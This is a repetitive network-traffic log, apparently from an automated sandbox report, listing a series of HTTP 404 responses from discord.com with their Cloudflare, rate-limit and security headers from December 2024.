__cfruid=82c40b0008dad80de20b0eba30cc0737be6c58ea-1735498995; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=0vKBVEFNkYlYVXo91uyIw4xSlPGkR.p81jHRFtBklDU-1735498995703-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0c929f6818b4-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:16 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735498997x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UUJyDjfDUkGiKocw%2FuDMYE4ETUqPi00WxERk6r6EjjLwSy3Qh0rNofwrvF57cCONQG6swhTRmAj6ZbNYnMtcMgQVZLFacggCM2Fw6Bb%2BEIUdiJwP17F%2BKvOcRDBN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=a43fb804982cca3653051a4b7746cea35628f37c-1735498996; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=pAFnR_wOrfdgh_Jtk3mByUUGMw9MwwYE7abgSZutqmQ-1735498996270-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0c94d816423b-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:17 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735498998x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WgRfN9v%2FuUjAxm9L0HQcD%2Blzb7zOsbXndjLxB%2Fhj3loyqvQOVNL2Na8pHZFWckiNkVb9%2FFgO3JeTpbT3rCzjyoqtaKW2SoiVC1xXhOTBiGE9KIbigiTeueRcAiQa"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=5501b16e0554bd3ddaeaf0e69ea9ea9655b8f544-1735498997; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=Ym5BP7VPJHeeelRZw3UktFYy9mpDLPNrX7DoUgkdP.w-1735498997537-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0c9e28f8c440-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:17 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735498999x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LMctKu3Lr039fNs%2BuAYjc1Gq6JWmteDeY%2FyWEkEwUYTwsMUdG75dAZTul2FSs787wTSYth6OeAgHU9nA9LHFEmSqYtruyswhmgOa5MF8KJaL6TDFA8Gdjy6hRVMS"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=5501b16e0554bd3ddaeaf0e69ea9ea9655b8f544-1735498997; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=4MHz39sMJ.4aXIHBGoP67murEA.xb8b1BSp2oPtxKIQ-1735498997984-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0ca0ad3819a1-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:19 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735499000x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u25464NmzNX9dthTQ5%2Fj7bcLl5Pwfqz9b82W2FiD%2BSFGPdrngx0W3yejJYbI8Xfe0jKgKTww%2FXeYU96K2ZhQfOXGDMPeypsx7u52z7i0M2qPj%2F2oKJ%2FHRsZL0M5S"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=7b04209e90e1112546946eda2546c3b3e0bcc4f1-1735498999; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=ZUkxNojZS0AFLrqTAM.KtcwifO6pROCknC90EhmpcTA-1735498999351-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0ca96bfd726e-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:19 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735499001x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9gEmXUCuxuKdlXrTzLqLyzzzEDCPwFX5RireTZPQMXcSdy7UlcWBfiI8Y9%2B8x3MSDj4oBaiCf6VC30GQm%2FsQ3Kj8I%2B%2BwfdJLxwgwBD1Lyhyif%2FM0U9rvm5BYV4re"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=7b04209e90e1112546946eda2546c3b3e0bcc4f1-1735498999; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=q4pV7cQg53DbTlzgI_Vu9bZZGis6Gdc07u7ronpmt6M-1735498999935-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0cacba2b7c7b-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:21 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735499002x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zrCmVsNjNq5u%2BRAY%2BINUKOyQxr%2F1eaXOv1AnPeMbGP0dVxBm0RRTbpqyZVd7WNw2tgPa36J7wC7qbSPzyi9aHQv2%2BEeOJmY5J4GV3m%2FT%2BnB9OBzPAe5y1gFbNB6p"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=dc5d754406e571a16d9932dbc45a1ea4a58ad2b1-1735499001; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=.i7hEaNZyIF6pvFbSmMCrHzzpxjkERy4Coa8qu0FnhA-1735499001162-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0cb4bac6c481-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:21 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735499003x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4wF4MQQG4Bk4E6c5AvU%2FrKQ%2FcynOk10ROdneChTTmi3bYNVyhWB%2B%2Bdev7ZB3I3UQA%2BmI1Hek2n2R3Del29QWramD4vR%2BDo2QunJkuGRnUe%2FNhpQynrcItUU%2BsdrQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=dc5d754406e571a16d9932dbc45a1ea4a58ad2b1-1735499001; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=GJ5fRUxb0DtTOaLBLsR4jw7B1AahuX5457h3nVnD49w-1735499001743-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0cb7b8601a07-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:22 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735499004x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Eg8oRCk90hk3MeldB9dwqX%2BYhzIdxm%2BYmgG24Yo9sLXOpeZqrUu3iZYMYyHh6z1owEs7sgedqQawlFIVkkjwgpnPFRXpVrY77ulaJ1GLjWkGgAubV6bXeh4MRbs%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=724caf6ede62f60297d90db326bffd5096f426b8-1735499002; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=YMbQa4_d8Gek9bDIIgFvXyOK8ACSSmB42A3R4_iwpVQ-1735499002908-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0cbfaa347c9a-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:23 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735499004x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nl99ekKSSYD4FXCLcN59GZUXCN23sIcLlDryIHOqCw6UGe34d35j%2FyPHgw2cQV0s0Rbw5YDTvXQAcsesV%2Fi1dyiRC3o86he5TnUxwVDR5qoy3M40G4MsCLP67vH6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=284b933d887621711a194cd280ec620ca121e88b-1735499003; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=F33tnXaHX2hFMP2mybrZUDtlCZleMHP.9ngqApzWCOw-1735499003501-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0cc328f28cd6-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:24 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735499006x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GvHMN4TxqtyVmpJYyfzjWBaN7jZKrvX%2FD4GpmiO8eBTMNdrU5nQ4KH9ZxGwfk3tobpRzDsgnq7%2FLS8rBfxKgsMcLd1ez4Qcv%2B3LsntXEifUzyoYPWJiKQoj6LtD3"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=12b5fb317103fbae89dd23732629684773005f81-1735499004; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=uKm2yP_HxOffG8iH37Q_80Ecxzuha8N7ZeGbr2smQSA-1735499004706-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0ccaec8f4276-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:25 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735499006x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VQJpf5IJY%2BPcxi%2FQOeBOh4bN%2FDxQ6c6CyDeFMyLx6ARqwlE4tuGSKasn%2BE7%2FMq%2BT5vqb7GZeOuIkyZNeXWYqbrbKO%2BJvFfl5Vz4YgWqEtuGkQ1I5lOEk02lbOUFy"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=6a2c9dada8228cf579dc5df331829f1373d81cea-1735499005; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=5C17tETGyVyUvkDD7_AyZ8TUM4WEf9t2UqFGz0W52Eg-1735499005208-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0ccdba8972a7-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:26 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735499007x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T66WDSC4GcJm2m2RwNl5bKVD7h5ZZwYnov6mcXuNb6I3vDxalOf5ZHkCeZ%2FKbDg5MeztL7BO%2Bt3ldQF0r%2BHW8Tj8viXfF6bwoMjA8CKG%2B2Qn1Au7f15jApIlxwk3"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=ecac402da22b5c6a6363170c9e4c0f1b3713c18e-1735499006; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=P1RKXsc8G9MmCIifE8YLX2xzStJMGtrs9k7VsOyrQ7o-1735499006436-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0cd5ea45efa7-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:27 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735499008x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4ZXpSo2%2BaXFyNgLwc9qdUp5Q%2BWrqlig%2Bhi7m0lOXyf5oyDeQ1HV8XPof0Idt5bAHjMMO%2BHQ4o9OWqBvbC3w0H1jGNn2DYIeT2dKAuMuM43yRemUHTSnFZyK0UeLA"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=04d1b9d4755c454c31ecf0afc21bee5b41f3d7fa-1735499007; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=CkAU4wvuinY7VSQBuxAaFe2MX0IoKrLwE0HNsPZZ4Xg-1735499007418-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0cdbe8c1c407-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:29 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735499010x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iBh7Rq%2BAp0gzXV7sV%2F7ItugGkH17M3ThQXbu0PIi4SKCvY5UK%2BwEKAr8jUeQC05gS%2FUTdMzQL3HzYblbH5LivrgeGy5kgHdeOLcHsmy3cdAwzakX3wGg%2BjPHG4bA"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=5c4d586504d8d523343951f151e8ee259ba7b2ee-1735499009; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=LNfy8_qwbtt_hjXnn9nd_fIg2vMpZSDGyBTxEpDlOeI-1735499009222-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0ce72898440b-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:31 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735499012x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y3sxO8scir0uydDeJ7QyCIYUzzuwYt5zMlZAjlYMKTYTWfpakHNlHprVCqcj9LAMNB52TCpl4eeP6VYyWI2Lnvn1obZFVpV0sUwNWOOGPDuk8hKoXRDLMXLYrym6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=60d593be25043467746a49639a50e2ddd2f9e886-1735499011; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=kRBOi1Ru0PZnWfTzRPU5lEJMjQG9HQbzYdLWckj.y_8-1735499011300-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0cf43d550c9e-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:33 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735499014x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gbd04dLuhc6PGTV3kMdSyj%2F0vobgnVIJJNGymvbxF1sBsnU4O1I7E1zNdtiWmCZmmDvddQr%2FTAHNKB9QfmmYOF0%2BtrnIafD74WT8ggCNIZRzP3G6owUzTYi4cb9Y"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=3c11febff06a62eff471598f21fc0e996cac8f1c-1735499013; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=8KSsCdofRdkxrBpX8n7VmHyYizZzLRP.9Ow1vHS5CDs-1735499013139-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0cffbe87c413-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:35 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735499016x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sy9KVxMVD7qf0C6XMFZts06mmLM2zknFTZVHOKq8N1GaYTqVIx%2F%2BrywOe%2BtD4yB6RiLEeng2DubUJoFoljXulw%2FklZWLOGA%2Frz2PE3wxdcQ7FjAhCx%2FlBDy0rP5z"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=07963cc75aadd327a08d2c3a65b4be31823db941-1735499015; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=BNIT.lVubmO1uY4cD5Oknv1LqR93i6aLkg9gBlI0aQs-1735499015083-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0d0bc97e41ff-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:36 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735499018x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nVR1gLEYepWg%2FUpW56YFuugIEnOg3p8LVZlWAP2S6ryeJfJwSjdmFsiIOVePds7J68eBwY46Y1sUP0%2FuwA46NNfTYXbqHkIb9jUEK1Z%2BEFtS6F8GKjnE0EALLniO"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=939315ec5b08a56be06b01f5f17246f24c77a27b-1735499016; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=NelU66JCyPIKGtGD.s8Q9iL4tLInET2dPU0HKcg63ss-1735499016870-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0d170f2b4265-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:38 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735499020x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mgWpswBdgMx2b0SoEuANWkk7odwTi%2FVKi%2B%2BOvIXjB7H8FLcQpm2G4IYiIXgjnrtm%2F1%2BnAYHw7KcUp0JLjCySpEkbRTmit2tsW6EAjb8ZgQNCjV27seFixYBvxaHL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=9b8c7d43b940635c42cdf38c4db9dc178568cfb8-1735499018; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=Id6kczLkB36zPT2qqtVzA5w7gyjwyENYmvaXkolcEQg-1735499018795-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0d230f8f7ce8-EWR
